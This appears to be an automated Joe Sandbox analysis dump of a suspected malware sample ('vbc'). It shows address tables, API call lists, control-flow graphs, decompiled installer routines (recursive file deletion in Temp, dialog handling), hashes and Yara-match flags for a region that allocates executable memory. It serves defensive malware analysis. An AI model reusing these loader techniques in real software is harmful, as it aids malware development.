                                                0x73282067
                                                0x73282068
                                                0x7328206e
                                                0x7328206e
                                                0x00000000
                                                0x7328206e
                                                0x73282062
                                                0x73282065
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73282065
                                                0x73281ff2
                                                0x73281ff4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281f60
                                                0x73281e05
                                                0x73281e05
                                                0x73281e06
                                                0x73281f46
                                                0x00000000
                                                0x73281f46
                                                0x73281e0c
                                                0x73281e0d
                                                0x00000000
                                                0x00000000
                                                0x73281e13
                                                0x73281e16
                                                0x73281f0b
                                                0x73281f0b
                                                0x73281f0e
                                                0x73281f23
                                                0x73281f25
                                                0x73281f25
                                                0x73281f26
                                                0x73281f29
                                                0x73281f2c
                                                0x73281f38
                                                0x73281f38
                                                0x73281f38
                                                0x73281f2e
                                                0x73281f2e
                                                0x73281f2e
                                                0x73281f3e
                                                0x00000000
                                                0x73281f3e
                                                0x73281f10
                                                0x73281f10
                                                0x73281f11
                                                0x73281f1f
                                                0x00000000
                                                0x73281f1f
                                                0x73281f14
                                                0x73281f15
                                                0x00000000
                                                0x00000000
                                                0x73281f1b
                                                0x00000000
                                                0x73281f1b
                                                0x73281e1c
                                                0x73281f07
                                                0x00000000
                                                0x73281f07
                                                0x73281e22
                                                0x73281e22
                                                0x73281e25
                                                0x73281e4e
                                                0x00000000
                                                0x73281e4e
                                                0x73281e27
                                                0x73281e27
                                                0x73281e2a
                                                0x73281e44
                                                0x00000000
                                                0x73281e44
                                                0x73281e2c
                                                0x73281e2c
                                                0x73281e2f
                                                0x73281e3e
                                                0x00000000
                                                0x73281e3e
                                                0x73281e32
                                                0x73281e33
                                                0x00000000
                                                0x00000000
                                                0x73281e35
                                                0x00000000
                                                0x73281cec
                                                0x73281cec
                                                0x73281cef
                                                0x00000000
                                                0x73281cef
                                                0x73281ce6
                                                0x73281cd3
                                                0x73281cd8
                                                0x00000000
                                                0x00000000
                                                0x73281cda
                                                0x73281cdd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73281cdd
                                                0x73281c6d
                                                0x73281c70
                                                0x73281ca6
                                                0x73281ca9
                                                0x00000000
                                                0x73281caf
                                                0x73281cb1
                                                0x73281cb5
                                                0x73281cbc
                                                0x73281cc3
                                                0x73281cc6
                                                0x73281cc9
                                                0x00000000
                                                0x73281cc9
                                                0x73281ca9
                                                0x73281c72
                                                0x73281c73
                                                0x73281c8e
                                                0x73281c91
                                                0x00000000
                                                0x73281c97
                                                0x73281c97
                                                0x73281c9e
                                                0x73281ca1
                                                0x00000000
                                                0x73281ca1
                                                0x73281c91
                                                0x73281c78
                                                0x00000000
                                                0x73281c7e
                                                0x73281c7e
                                                0x73281c85
                                                0x00000000
                                                0x73281c85
                                                0x73281c78
                                                0x73281e74
                                                0x73281e79
                                                0x73281e7e
                                                0x73281e82
                                                0x73282355
                                                0x7328235b
                                                0x73281e94
                                                0x73281e96
                                                0x73281e97
                                                0x7328227e
                                                0x7328227e
                                                0x73282281
                                                0x73282284
                                                0x732822a1
                                                0x732822a7
                                                0x732822a9
                                                0x732822af
                                                0x732822c6
                                                0x732822c6
                                                0x732822c6
                                                0x732822d3
                                                0x732822d9
                                                0x732822dc
                                                0x732822e2
                                                0x732822e4
                                                0x732822e8
                                                0x732822ea
                                                0x732822f1
                                                0x732822f6
                                                0x732822f9
                                                0x732822fb
                                                0x73282300
                                                0x73282312
                                                0x73282312
                                                0x73282300
                                                0x732822f9
                                                0x732822e8
                                                0x73282318
                                                0x7328231b
                                                0x73282325
                                                0x7328232d
                                                0x7328233a
                                                0x73282340
                                                0x73282343
                                                0x73282273
                                                0x73282273
                                                0x00000000
                                                0x73282273
                                                0x73282349
                                                0x7328234f
                                                0x7328234f
                                                0x00000000
                                                0x00000000
                                                0x73282351
                                                0x73282351
                                                0x73282351
                                                0x73282351
                                                0x00000000
                                                0x7328231d
                                                0x7328231d
                                                0x73282323
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73282323
                                                0x7328231b
                                                0x732822b2
                                                0x732822b8
                                                0x732822ba
                                                0x732822c0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x732822c0
                                                0x73282286
                                                0x7328228d
                                                0x73282293
                                                0x73282299
                                                0x00000000
                                                0x73282299
                                                0x73281e9d
                                                0x73281e9e
                                                0x7328225d
                                                0x7328225d
                                                0x73282263
                                                0x73282266
                                                0x00000000
                                                0x00000000
                                                0x7328226d
                                                0x73282272
                                                0x00000000
                                                0x73282272
                                                0x73281ea5
                                                0x00000000
                                                0x00000000
                                                0x73281eab
                                                0x73281eab
                                                0x73281eb4
                                                0x73281eb9
                                                0x73281ebf
                                                0x00000000
                                                0x00000000
                                                0x73281ec5
                                                0x73281ed2
                                                0x73281ed8
                                                0x73281ee2
                                                0x73281ee8
                                                0x73281ef0
                                                0x73281f00
                                                0x00000000
                                                0x73281f00

                                                APIs
                                                  • Part of subcall function 732812BB: GlobalAlloc.KERNELBASE(00000040,?,732812DB,?,7328137F,00000019,732811CA,-000000A0), ref: 732812C5
                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 73281D2D
                                                • lstrcpyW.KERNEL32(00000008,?), ref: 73281D75
                                                • lstrcpyW.KERNEL32(00000808,?), ref: 73281D7F
                                                • GlobalFree.KERNEL32(00000000), ref: 73281D92
                                                • GlobalFree.KERNEL32(?), ref: 73281E74
                                                • GlobalFree.KERNEL32(?), ref: 73281E79
                                                • GlobalFree.KERNEL32(?), ref: 73281E7E
                                                • GlobalFree.KERNEL32(00000000), ref: 73282068
                                                • lstrcpyW.KERNEL32(?,?), ref: 73282222
                                                • GetModuleHandleW.KERNEL32(00000008), ref: 732822A1
                                                • LoadLibraryW.KERNEL32(00000008), ref: 732822B2
                                                • GetProcAddress.KERNEL32(?,?), ref: 7328230C
                                                • lstrlenW.KERNEL32(00000808), ref: 73282326
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680334815.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true
                                                • Associated: 00000004.00000002.680330419.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680339813.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680344167.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73280000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                • String ID:
                                                • API String ID: 245916457-0
                                                • Opcode ID: e76836966a224de07889179de3a56976589f11d59966701e1a55e8e6eee12a4e
                                                • Instruction ID: bde674b89ea2efbae24d9cf95df647bf0a9520796ee205eed234c3959f478019
                                                • Opcode Fuzzy Hash: e76836966a224de07889179de3a56976589f11d59966701e1a55e8e6eee12a4e
                                                • Instruction Fuzzy Hash: F7228971E1030ADFDB129FA4C5847EEB7B4FB08315F24852AD1A6E62C4D7B4A6C1CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 663 405c49-405c6f call 405f14 666 405c71-405c83 DeleteFileW 663->666 667 405c88-405c8f 663->667 668 405e05-405e09 666->668 669 405c91-405c93 667->669 670 405ca2-405cb2 call 40653d 667->670 671 405db3-405db8 669->671 672 405c99-405c9c 669->672 678 405cc1-405cc2 call 405e58 670->678 679 405cb4-405cbf lstrcatW 670->679 671->668 675 405dba-405dbd 671->675 672->670 672->671 676 405dc7-405dcf call 406873 675->676 677 405dbf-405dc5 675->677 676->668 687 405dd1-405de5 call 405e0c call 405c01 676->687 677->668 681 405cc7-405ccb 678->681 679->681 683 405cd7-405cdd lstrcatW 681->683 684 405ccd-405cd5 681->684 686 405ce2-405cfe lstrlenW FindFirstFileW 683->686 684->683 684->686 688 405d04-405d0c 686->688 689 405da8-405dac 686->689 703 405de7-405dea 687->703 704 405dfd-405e00 call 40559f 687->704 691 405d2c-405d40 call 40653d 688->691 692 405d0e-405d16 688->692 689->671 694 405dae 689->694 705 405d42-405d4a 691->705 706 405d57-405d62 call 405c01 691->706 695 405d18-405d20 692->695 696 405d8b-405d9b FindNextFileW 692->696 694->671 695->691 699 405d22-405d2a 695->699 696->688 702 405da1-405da2 FindClose 696->702 699->691 699->696 702->689 703->677 708 405dec-405dfb call 40559f call 4062fd 703->708 704->668 705->696 709 405d4c-405d55 call 405c49 705->709 714 405d83-405d86 call 40559f 706->714 715 405d64-405d67 706->715 708->668 709->696 714->696 718 405d69-405d79 call 40559f call 4062fd 715->718 719 405d7b-405d81 715->719 718->696 719->696
                                                C-Code - Quality: 98%
                                                			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				short _v556;
                                                				short _v558;
                                                				struct _WIN32_FIND_DATAW _v604;
                                                				signed int _t38;
                                                				signed int _t52;
                                                				signed int _t55;
                                                				signed int _t62;
                                                				void* _t64;
                                                				signed char _t65;
                                                				WCHAR* _t66;
                                                				void* _t67;
                                                				WCHAR* _t68;
                                                				void* _t70;
                                                
                                                				_t65 = _a8;
                                                				_t68 = _a4;
                                                				_v8 = _t65 & 0x00000004;
                                                				_t38 = E00405F14(__eflags, _t68);
                                                				_v12 = _t38;
                                                				if((_t65 & 0x00000008) != 0) {
                                                					_t62 = DeleteFileW(_t68); // executed
                                                					asm("sbb eax, eax");
                                                					_t64 =  ~_t62 + 1;
                                                					 *0x434f88 =  *0x434f88 + _t64;
                                                					return _t64;
                                                				}
                                                				_a4 = _t65;
                                                				_t8 =  &_a4;
                                                				 *_t8 = _a4 & 0x00000001;
                                                				__eflags =  *_t8;
                                                				if( *_t8 == 0) {
                                                					L5:
                                                					E0040653D(0x42f270, _t68);
                                                					__eflags = _a4;
                                                					if(_a4 == 0) {
                                                						E00405E58(_t68);
                                                					} else {
                                                						lstrcatW(0x42f270, L"\\*.*");
                                                					}
                                                					__eflags =  *_t68;
                                                					if( *_t68 != 0) {
                                                						L10:
                                                						lstrcatW(_t68, 0x40a014);
                                                						L11:
                                                						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                						_t38 = FindFirstFileW(0x42f270,  &_v604);
                                                						_t70 = _t38;
                                                						__eflags = _t70 - 0xffffffff;
                                                						if(_t70 == 0xffffffff) {
                                                							L26:
                                                							__eflags = _a4;
                                                							if(_a4 != 0) {
                                                								_t30 = _t66 - 2;
                                                								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                								__eflags =  *_t30;
                                                							}
                                                							goto L28;
                                                						} else {
                                                							goto L12;
                                                						}
                                                						do {
                                                							L12:
                                                							__eflags = _v604.cFileName - 0x2e;
                                                							if(_v604.cFileName != 0x2e) {
                                                								L16:
                                                								E0040653D(_t66,  &(_v604.cFileName));
                                                								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                								if(__eflags == 0) {
                                                									_t52 = E00405C01(__eflags, _t68, _v8);
                                                									__eflags = _t52;
                                                									if(_t52 != 0) {
                                                										E0040559F(0xfffffff2, _t68);
                                                									} else {
                                                										__eflags = _v8 - _t52;
                                                										if(_v8 == _t52) {
                                                											 *0x434f88 =  *0x434f88 + 1;
                                                										} else {
                                                											E0040559F(0xfffffff1, _t68);
                                                											E004062FD(_t67, _t68, 0);
                                                										}
                                                									}
                                                								} else {
                                                									__eflags = (_a8 & 0x00000003) - 3;
                                                									if(__eflags == 0) {
                                                										E00405C49(__eflags, _t68, _a8);
                                                									}
                                                								}
                                                								goto L24;
                                                							}
                                                							__eflags = _v558;
                                                							if(_v558 == 0) {
                                                								goto L24;
                                                							}
                                                							__eflags = _v558 - 0x2e;
                                                							if(_v558 != 0x2e) {
                                                								goto L16;
                                                							}
                                                							__eflags = _v556;
                                                							if(_v556 == 0) {
                                                								goto L24;
                                                							}
                                                							goto L16;
                                                							L24:
                                                							_t55 = FindNextFileW(_t70,  &_v604);
                                                							__eflags = _t55;
                                                						} while (_t55 != 0);
                                                						_t38 = FindClose(_t70);
                                                						goto L26;
                                                					}
                                                					__eflags =  *0x42f270 - 0x5c;
                                                					if( *0x42f270 != 0x5c) {
                                                						goto L11;
                                                					}
                                                					goto L10;
                                                				} else {
                                                					__eflags = _t38;
                                                					if(_t38 == 0) {
                                                						L28:
                                                						__eflags = _a4;
                                                						if(_a4 == 0) {
                                                							L36:
                                                							return _t38;
                                                						}
                                                						__eflags = _v12;
                                                						if(_v12 != 0) {
                                                							_t38 = E00406873(_t68);
                                                							__eflags = _t38;
                                                							if(_t38 == 0) {
                                                								goto L36;
                                                							}
                                                							E00405E0C(_t68);
                                                							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                                                							__eflags = _t38;
                                                							if(_t38 != 0) {
                                                								return E0040559F(0xffffffe5, _t68);
                                                							}
                                                							__eflags = _v8;
                                                							if(_v8 == 0) {
                                                								goto L30;
                                                							}
                                                							E0040559F(0xfffffff1, _t68);
                                                							return E004062FD(_t67, _t68, 0);
                                                						}
                                                						L30:
                                                						 *0x434f88 =  *0x434f88 + 1;
                                                						return _t38;
                                                					}
                                                					__eflags = _t65 & 0x00000002;
                                                					if((_t65 & 0x00000002) == 0) {
                                                						goto L28;
                                                					}
                                                					goto L5;
                                                				}
                                                			}


















                                                0x00405c53
                                                0x00405c58
                                                0x00405c61
                                                0x00405c64
                                                0x00405c6c
                                                0x00405c6f
                                                0x00405c72
                                                0x00405c7a
                                                0x00405c7c
                                                0x00405c7d
                                                0x00000000
                                                0x00405c7d
                                                0x00405c88
                                                0x00405c8b
                                                0x00405c8b
                                                0x00405c8b
                                                0x00405c8f
                                                0x00405ca2
                                                0x00405ca9
                                                0x00405cae
                                                0x00405cb2
                                                0x00405cc2
                                                0x00405cb4
                                                0x00405cba
                                                0x00405cba
                                                0x00405cc7
                                                0x00405ccb
                                                0x00405cd7
                                                0x00405cdd
                                                0x00405ce2
                                                0x00405ce8
                                                0x00405cf3
                                                0x00405cf9
                                                0x00405cfb
                                                0x00405cfe
                                                0x00405da8
                                                0x00405da8
                                                0x00405dac
                                                0x00405dae
                                                0x00405dae
                                                0x00405dae
                                                0x00405dae
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405d04
                                                0x00405d04
                                                0x00405d04
                                                0x00405d0c
                                                0x00405d2c
                                                0x00405d34
                                                0x00405d39
                                                0x00405d40
                                                0x00405d5b
                                                0x00405d60
                                                0x00405d62
                                                0x00405d86
                                                0x00405d64
                                                0x00405d64
                                                0x00405d67
                                                0x00405d7b
                                                0x00405d69
                                                0x00405d6c
                                                0x00405d74
                                                0x00405d74
                                                0x00405d67
                                                0x00405d42
                                                0x00405d48
                                                0x00405d4a
                                                0x00405d50
                                                0x00405d50
                                                0x00405d4a
                                                0x00000000
                                                0x00405d40
                                                0x00405d0e
                                                0x00405d16
                                                0x00000000
                                                0x00000000
                                                0x00405d18
                                                0x00405d20
                                                0x00000000
                                                0x00000000
                                                0x00405d22
                                                0x00405d2a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405d8b
                                                0x00405d93
                                                0x00405d99
                                                0x00405d99
                                                0x00405da2
                                                0x00000000
                                                0x00405da2
                                                0x00405ccd
                                                0x00405cd5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405c91
                                                0x00405c91
                                                0x00405c93
                                                0x00405db3
                                                0x00405db5
                                                0x00405db8
                                                0x00405e09
                                                0x00405e09
                                                0x00405e09
                                                0x00405dba
                                                0x00405dbd
                                                0x00405dc8
                                                0x00405dcd
                                                0x00405dcf
                                                0x00000000
                                                0x00000000
                                                0x00405dd2
                                                0x00405dde
                                                0x00405de3
                                                0x00405de5
                                                0x00000000
                                                0x00405e00
                                                0x00405de7
                                                0x00405dea
                                                0x00000000
                                                0x00000000
                                                0x00405def
                                                0x00000000
                                                0x00405df6
                                                0x00405dbf
                                                0x00405dbf
                                                0x00000000
                                                0x00405dbf
                                                0x00405c99
                                                0x00405c9c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405c9c

                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                • lstrcatW.KERNEL32 ref: 00405CBA
                                                • lstrcatW.KERNEL32 ref: 00405CDD
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-2602864334
                                                • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 981 36f57f0-36f5852 982 36f585c-36f5957 NtAllocateVirtualMemory 981->982 983 36f5857 call 36f6bbc 981->983 984 36f595d-36f5a3a call 36f6b86 call 36f599f 982->984 983->982 990 36f5a3b 984->990 990->990
                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(2D8F4F79,89ADB1F8,-C72EFA09,89ADB1FC), ref: 036F5943
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID: 5
                                                • API String ID: 2167126740-2226203566
                                                • Opcode ID: 3ebc518d009baae5aaca5bda34bc415db8ed7ab55fbb7adec2e00e5105709bb0
                                                • Instruction ID: c3986dd9f393342738f3e32e5e1211bcb774eb85112a3a734f9fff38ac58308c
                                                • Opcode Fuzzy Hash: 3ebc518d009baae5aaca5bda34bc415db8ed7ab55fbb7adec2e00e5105709bb0
                                                • Instruction Fuzzy Hash: D041DDB56083498FDB60DF28DC91BEE7BA0AF99350F04402EDD8D9B360D7358A84CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406873(WCHAR* _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                                                				if(_t2 == 0xffffffff) {
                                                					return 0;
                                                				}
                                                				FindClose(_t2);
                                                				return 0x4302b8;
                                                			}




                                                0x0040687e
                                                0x00406887
                                                0x00000000
                                                0x00406894
                                                0x0040688a
                                                0x00000000

                                                APIs
                                                • FindFirstFileW.KERNELBASE(74EDD4C4,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74EDD4C4,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,74EDD4C4,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                • FindClose.KERNEL32(00000000), ref: 0040688A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID:
                                                • API String ID: 2295610775-0
                                                • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(2D8F4F79,89ADB1F8,-C72EFA09,89ADB1FC), ref: 036F5943
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: a18bb03251ad47b49fdbe6f67cfa67f15f2f1cfb45d3128e6ab769d3bf34c232
                                                • Instruction ID: 8447f620a35eb2d8fe66af1516bd2a381cddfff7d34d98581d94483d2c68c6ec
                                                • Opcode Fuzzy Hash: a18bb03251ad47b49fdbe6f67cfa67f15f2f1cfb45d3128e6ab769d3bf34c232
                                                • Instruction Fuzzy Hash: B15123B16147898FEB30DE28DC947EE3BE5AF5A310F44402EDE8A8B350D3358A85CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(2D8F4F79,89ADB1F8,-C72EFA09,89ADB1FC), ref: 036F5943
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: 9fb603fede25fb898487281d482ffd6bfc4faf2318a45113ad9fbe8bf1240638
                                                • Instruction ID: b143ad7b2ecabc9fc108ebe947da962501fa16b74a20635063cb5eb13ca269ef
                                                • Opcode Fuzzy Hash: 9fb603fede25fb898487281d482ffd6bfc4faf2318a45113ad9fbe8bf1240638
                                                • Instruction Fuzzy Hash: 9541EEB16147898FEB30DE28CC947DA3BE1AF5A360F44412EDE898B360D3358A458B42
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(2D8F4F79,89ADB1F8,-C72EFA09,89ADB1FC), ref: 036F5943
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: f264c035c0c9ea3825a9e03a2f100137f5bed00b5414c21b867614c4a91e0cca
                                                • Instruction ID: 7e07f07f9921a3c3c58824c7dbcdb1b12f9d0f2e51026527925b2920b92a28bb
                                                • Opcode Fuzzy Hash: f264c035c0c9ea3825a9e03a2f100137f5bed00b5414c21b867614c4a91e0cca
                                                • Instruction Fuzzy Hash: 9741D0B16193898FDB30DF28DC95BDA7BE0AF5A310F04802EDE8D8B264D3354A45CB56
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAddVectoredExceptionHandler.NTDLL ref: 036F8399
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36f0000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionHandlerVectored
                                                • String ID:
                                                • API String ID: 3310709589-0
                                                • Opcode ID: 142380cb7f3e0cb9b4cda54e9b256ef6fd6461e881c6f1a09808c426975aabf4
                                                • Instruction ID: a69744aa7d0ed6810904c949ef738bb57089f8530352077443aee32ec125cb33
                                                • Opcode Fuzzy Hash: 142380cb7f3e0cb9b4cda54e9b256ef6fd6461e881c6f1a09808c426975aabf4
                                                • Instruction Fuzzy Hash: 80F019766007898FDB68DE688DD83DA37A3AFC4305F248179CD499B714DB3499858A00
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 194 403f9a-403fac 195 403fb2-403fb8 194->195 196 404113-404122 194->196 195->196 197 403fbe-403fc7 195->197 198 404171-404186 196->198 199 404124-40416c GetDlgItem * 2 call 404499 SetClassLongW call 40140b 196->199 200 403fc9-403fd6 SetWindowPos 197->200 201 403fdc-403fe3 197->201 203 4041c6-4041cb call 4044e5 198->203 204 404188-40418b 198->204 199->198 200->201 206 403fe5-403fff ShowWindow 201->206 207 404027-40402d 201->207 212 4041d0-4041eb 203->212 209 40418d-404198 call 401389 204->209 210 4041be-4041c0 204->210 213 404100-40410e call 404500 206->213 214 404005-404018 GetWindowLongW 206->214 215 404046-404049 207->215 216 40402f-404041 DestroyWindow 207->216 209->210 229 40419a-4041b9 SendMessageW 209->229 210->203 211 404466 210->211 223 404468-40446f 211->223 220 4041f4-4041fa 212->220 221 4041ed-4041ef call 40140b 212->221 213->223 214->213 222 40401e-404021 ShowWindow 214->222 226 40404b-404057 SetWindowLongW 215->226 227 40405c-404062 215->227 224 404443-404449 216->224 233 404200-40420b 220->233 234 404424-40443d DestroyWindow EndDialog 220->234 221->220 222->207 224->211 232 40444b-404451 224->232 226->223 227->213 235 404068-404077 GetDlgItem 227->235 229->223 232->211 236 404453-40445c ShowWindow 232->236 233->234 237 404211-40425e call 40657a call 404499 * 3 GetDlgItem 233->237 234->224 238 404096-404099 235->238 239 404079-404090 SendMessageW IsWindowEnabled 235->239 236->211 266 404260-404265 237->266 267 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 237->267 240 40409b-40409c 238->240 241 40409e-4040a1 238->241 239->211 239->238 243 4040cc-4040d1 call 404472 240->243 244 4040a3-4040a9 241->244 245 4040af-4040b4 241->245 243->213 247 4040ea-4040fa SendMessageW 244->247 248 4040ab-4040ad 244->248 245->247 249 4040b6-4040bc 245->249 247->213 248->243 252 4040d3-4040dc call 40140b 249->252 253 4040be-4040c4 call 40140b 249->253 252->213 262 4040de-4040e8 252->262 264 4040ca 253->264 262->264 264->243 266->267 270 4042a6-4042a7 267->270 271 4042a9 267->271 272 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042db-4042ec SendMessageW 272->273 274 4042ee 272->274 275 4042f4-404333 call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 273->275 274->275 275->212 286 404339-40433b 275->286 286->212 287 404341-404345 286->287 288 404364-404378 DestroyWindow 287->288 289 404347-40434d 287->289 288->224 291 40437e-4043ab CreateDialogParamW 288->291 289->211 290 404353-404359 289->290 290->212 292 40435f 290->292 291->224 293 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->211 293->211 298 40440a-40441d ShowWindow call 4044e5 293->298 300 404422 298->300 300->224
                                                C-Code - Quality: 84%
                                                			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                				struct HWND__* _v28;
